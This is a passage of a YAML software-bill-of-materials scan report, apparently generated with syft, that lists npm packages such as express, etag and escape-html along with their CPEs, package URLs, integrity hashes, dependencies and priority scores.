integrity: sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==
|
|
dependencies:
|
|
es-errors: ^1.3.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: cdf746578205af98
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: es-set-tostringtag 2.1.0'
|
|
title: es-set-tostringtag 2.1.0
|
|
description: 'Package discovered: es-set-tostringtag 2.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 8f498e19379b53ea
|
|
name: es-set-tostringtag
|
|
version: 2.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:es-set-tostringtag:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es-set-tostringtag:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es_set_tostringtag:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es_set_tostringtag:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es-set:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es-set:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es_set:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es_set:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es:es-set-tostringtag:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:es:es_set_tostringtag:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/es-set-tostringtag@2.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz
|
|
integrity: sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==
|
|
dependencies:
|
|
es-errors: ^1.3.0
|
|
get-intrinsic: ^1.2.6
|
|
has-tostringtag: ^1.0.2
|
|
hasown: ^2.0.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 3d860225864c56d0
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: escalade 3.2.0'
|
|
title: escalade 3.2.0
|
|
description: 'Package discovered: escalade 3.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2a58ccd5fc44a7b2
|
|
name: escalade
|
|
version: 3.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:escalade:escalade:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/escalade@3.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz
|
|
integrity: sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2f35769c64d37fb5
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: escape-html 1.0.3'
|
|
title: escape-html 1.0.3
|
|
description: 'Package discovered: escape-html 1.0.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 94fc6050cdb348bc
|
|
name: escape-html
|
|
version: 1.0.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:escape-html:escape-html:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:escape-html:escape_html:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:escape_html:escape-html:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:escape_html:escape_html:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:escape:escape-html:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:escape:escape_html:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/escape-html@1.0.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/escape-html/-/escape-html-1.0.3.tgz
|
|
integrity: sha512-NiSupZ4OeuGwr68lGIeym/ksIZMJodUGOSCZ/FSnTxcrekbvqrgdUxlJOMpijaKZVjAJrWrGs/6Jy8OMuyj9ow==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b31fcb4e8c7ac0d8
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: etag 1.8.1'
|
|
title: etag 1.8.1
|
|
description: 'Package discovered: etag 1.8.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 4ddb33d9fc7b6ece
|
|
name: etag
|
|
version: 1.8.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:etag:etag:1.8.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/etag@1.8.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/etag/-/etag-1.8.1.tgz
|
|
integrity: sha512-aIL5Fx7mawVa300al2BnEE4iNvo1qETxLrPI/o05L7z6go7fCw1J6EQmbK4FmJ2AS7kgVF/KEZWufBfdClMcPg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 643445c96492a454
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: event-target-shim 5.0.1'
|
|
title: event-target-shim 5.0.1
|
|
description: 'Package discovered: event-target-shim 5.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 419bcd6d1f4e7103
|
|
name: event-target-shim
|
|
version: 5.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:event-target-shim:event-target-shim:5.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:event-target-shim:event_target_shim:5.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:event_target_shim:event-target-shim:5.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:event_target_shim:event_target_shim:5.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:event-target:event-target-shim:5.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:event-target:event_target_shim:5.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:event_target:event-target-shim:5.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:event_target:event_target_shim:5.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:event:event-target-shim:5.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:event:event_target_shim:5.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/event-target-shim@5.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/event-target-shim/-/event-target-shim-5.0.1.tgz
|
|
integrity: sha512-i/2XbnSz/uxRCU6+NdVJgKWDTM427+MqYbkQzD321DuCQJUqOuJKIA0IM2+W2xtYHdKOmZ4dR6fExsd4SXL+WQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: df7be298e5b5835f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: eventemitter3 4.0.7'
|
|
title: eventemitter3 4.0.7
|
|
description: 'Package discovered: eventemitter3 4.0.7'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2bf11b6ac833063c
|
|
name: eventemitter3
|
|
version: 4.0.7
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:eventemitter3:eventemitter3:4.0.7:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/eventemitter3@4.0.7
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/eventemitter3/-/eventemitter3-4.0.7.tgz
|
|
integrity: sha512-8guHBZCwKnFhYdHr2ysuRWErTwhoN2X8XELRlrRwpmfeY2jjuUN4taQMsULKUVo1K4DvZl+0pgfyoysHxvmvEw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 8f3c29afa2938d65
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: events 3.3.0'
|
|
title: events 3.3.0
|
|
description: 'Package discovered: events 3.3.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: bca3d6fcf9ecc55d
|
|
name: events
|
|
version: 3.3.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:events:events:3.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/events@3.3.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/events/-/events-3.3.0.tgz
|
|
integrity: sha512-mQw+2fkQbALzQ7V0MY0IqdnXNOeTtP4r0lN9z7AAawCXgqea7bDii20AYrIBrFd/Hx0M2Ocz6S111CaFkUcb0Q==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 42a06b319afe7e6e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: express 4.22.1'
|
|
title: express 4.22.1
|
|
description: 'Package discovered: express 4.22.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 7bcabe4027921ced
|
|
name: express
|
|
version: 4.22.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:openjsf:express:4.22.1:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/express@4.22.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/express/-/express-4.22.1.tgz
|
|
integrity: sha512-F2X8g9P1X7uCPZMA3MVf9wcTqlyNp7IhH5qPCI0izhaOIYXaW9L535tGA3qmjRzpH+bZczqq7hVKxTR4NWnu+g==
|
|
dependencies:
|
|
accepts: ~1.3.8
|
|
array-flatten: 1.1.1
|
|
body-parser: ~1.20.3
|
|
content-disposition: ~0.5.4
|
|
content-type: ~1.0.4
|
|
cookie: ~0.7.1
|
|
cookie-signature: ~1.0.6
|
|
debug: 2.6.9
|
|
depd: 2.0.0
|
|
encodeurl: ~2.0.0
|
|
escape-html: ~1.0.3
|
|
etag: ~1.8.1
|
|
finalhandler: ~1.3.1
|
|
fresh: ~0.5.2
|
|
http-errors: ~2.0.0
|
|
merge-descriptors: 1.0.3
|
|
methods: ~1.1.2
|
|
on-finished: ~2.4.1
|
|
parseurl: ~1.3.3
|
|
path-to-regexp: ~0.1.12
|
|
proxy-addr: ~2.0.7
|
|
qs: ~6.14.0
|
|
range-parser: ~1.2.1
|
|
safe-buffer: 5.2.1
|
|
send: ~0.19.0
|
|
serve-static: ~1.16.2
|
|
setprototypeof: 1.2.0
|
|
statuses: ~2.0.1
|
|
type-is: ~1.6.18
|
|
utils-merge: 1.0.1
|
|
vary: ~1.1.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ba97090edfd08e19
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: express-rate-limit 8.5.1'
|
|
title: express-rate-limit 8.5.1
|
|
description: 'Package discovered: express-rate-limit 8.5.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 41f99f3613a4245b
|
|
name: express-rate-limit
|
|
version: 8.5.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:express-rate-limit:express-rate-limit:8.5.1:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/express-rate-limit@8.5.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/express-rate-limit/-/express-rate-limit-8.5.1.tgz
|
|
integrity: sha512-5O6KYmyJEpuPJV5hNTXKbAHWRqrzyu+OI3vUnSd2kXFubIVpG7ezpgxQy76Zo5GQZtrQBg86hF+CM/NX+cioiQ==
|
|
dependencies:
|
|
ip-address: ^10.2.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f780fc7a8f12c92d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: extend 3.0.2'
|
|
title: extend 3.0.2
|
|
description: 'Package discovered: extend 3.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: c7f94791a09e5a4e
|
|
name: extend
|
|
version: 3.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:extend_project:extend:3.0.2:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/extend@3.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/extend/-/extend-3.0.2.tgz
|
|
integrity: sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9507c5e5a8d55fc3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: farmhash-modern 1.1.0'
|
|
title: farmhash-modern 1.1.0
|
|
description: 'Package discovered: farmhash-modern 1.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2efb607597053214
|
|
name: farmhash-modern
|
|
version: 1.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:farmhash-modern:farmhash-modern:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:farmhash-modern:farmhash_modern:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:farmhash_modern:farmhash-modern:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:farmhash_modern:farmhash_modern:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:farmhash:farmhash-modern:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:farmhash:farmhash_modern:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/farmhash-modern@1.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/farmhash-modern/-/farmhash-modern-1.1.0.tgz
|
|
integrity: sha512-6ypT4XfgqJk/F3Yuv4SX26I3doUjt0GTG4a+JgWxXQpxXzTBq8fPUeGHfcYMMDPHJHm3yPOSjaeBwBGAHWXCdA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7b51b4692c5fdf0a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: fast-deep-equal 2.0.1'
|
|
title: fast-deep-equal 2.0.1
|
|
description: 'Package discovered: fast-deep-equal 2.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 18c3431d6798a7cd
|
|
name: fast-deep-equal
|
|
version: 2.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:fast-deep-equal:fast-deep-equal:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:fast-deep-equal:fast_deep_equal:2.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
